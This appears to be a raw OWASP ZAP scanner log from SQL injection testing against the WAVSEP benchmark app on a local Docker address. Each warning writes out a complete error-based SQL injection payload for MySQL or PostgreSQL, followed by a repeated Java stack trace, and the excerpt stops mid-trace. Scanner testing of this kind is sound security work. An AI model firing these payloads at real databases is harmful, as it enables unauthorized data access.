org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680632 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 5055 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5055=5055,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yrIr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 5055 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5055=5055,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yrIr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680632 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 6976 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6976=6976,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('aIKj'='aIKj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 6976 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6976=6976,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('aIKj'='aIKj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680633 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6224=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6224=6224) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (1168=1168] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 6224=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6224=6224) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (1168=1168 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680634 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 2457 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2457=2457,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'czvw'='czvw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 2457 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2457=2457,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'czvw'='czvw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680635 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 6716=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6716=6716) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6716=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6716=6716) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680635 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 3733 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3733=3733,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 3733 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3733=3733,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680636 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2971=2971,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- aLQq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2971=2971,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- aLQq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680636 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 4384=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4384=4384) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('KRbD'='KRbD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 4384=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4384=4384) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('KRbD'='KRbD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680638 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3343=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3343=3343) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7401=7401] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3343=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3343=3343) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7401=7401 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680638 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 3993=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3993=3993) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'OaMK'='OaMK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3993=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3993=3993) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'OaMK'='OaMK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680640 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 6036=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6036=6036) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 6036=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6036=6036) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680640 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3505=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3505=3505) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3505=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3505=3505) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at 